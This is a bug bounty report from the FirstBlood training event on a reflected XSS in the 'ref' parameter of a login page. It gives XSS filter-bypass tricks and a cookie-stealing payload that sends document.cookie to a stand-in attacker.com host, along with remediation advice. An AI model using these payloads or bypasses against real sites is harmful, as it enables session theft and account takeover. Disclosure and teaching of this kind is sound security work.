FirstBlood-#154Reflective XSS on /login.php endpoint through the vulnerable `ref` parameter



On 2021-05-10, holybugx reported:

Description

Hello Sean,

I found out that there is a reflected XSS on the /login.php endpoint through the vulnerable ref parameter which leads to account takeover.

Steps to reproduce

  1. Open the following link:
http://firstbloodhackers.com/login.php?action=login&ref=ja%09vascript:confirm`1`
  1. Click on the Return to previous page and the XSS pops-up:

Filter bypass

I found out that certain keywords are being blocked and removed, I realized javascript keyword is being removed so I tried couple of encoding tricks such as java%09script but then I realized using this payload java keyword is removed, also realized alert keyword and ( are being removed.

I used the following tricks to bypass the filtering:

  • javascript --> ja%09vascript
  • alert --> confirm
  • ( ) --> ``

Bypass explanation

  • You can use multiple encoding/unicoding tricks to bypass the javascript keyword being removed, an example of such is:
ja%09vascript
ja%0avascript
ja%0dvascript
  • You can use confirm or prompt if keywords such as alert is blocked.

  • When parentheses are filtered you can either use ` ` as I did, or in some cases you can use encoding tricks such as HTML encode or URL encoding/Double URL encoding.

confirm(1) --> confirm`1`

Exploitation

An attacker can craft a payload to steal cookies, an example of such payload is:

http://firstbloodhackers.com/login.php?ref=ja%09vascript:window.location.href=%60http://attacker.com/$%7Bdocument.cookie%7D%60

Where http://attacker.com is the attacker's domain, opening the above link and clicking on the Return to previous page results in a redirection to the attacker's domain and the cookies will be sent to the attacker's server.

An attacker can set this cookie on his browser to access drAdmin (Administrator).

This happens because of two cookies misconfiguration:

  1. Cookies are not set as httponly which makes it possible for an attacker to steal cookies using javascript.

  2. Cookies are not deleted/expired as they meant to be after logging out, which makes it possible for an attacker to re-use the cookies whenever he wants to.

Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/

Remediation

  1. The ref parameter should not be controlled by users.
  2. Preferably set httponly cookies so that javascript can not be used to steal cookies.

Impact

  • Account takeover

Best regards,

HolyBugx

P3 Medium

Parameter:

Payload:


FirstBlood ID: 3
Vulnerability Type: Reflective XSS

The parameter "ref" is vulnerable to XSS on login.php. The developer has tried to prevent a malicious actor from redirecting to a javascript URI but the attempt to stop this was poor and thus it can be bypassed.


Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.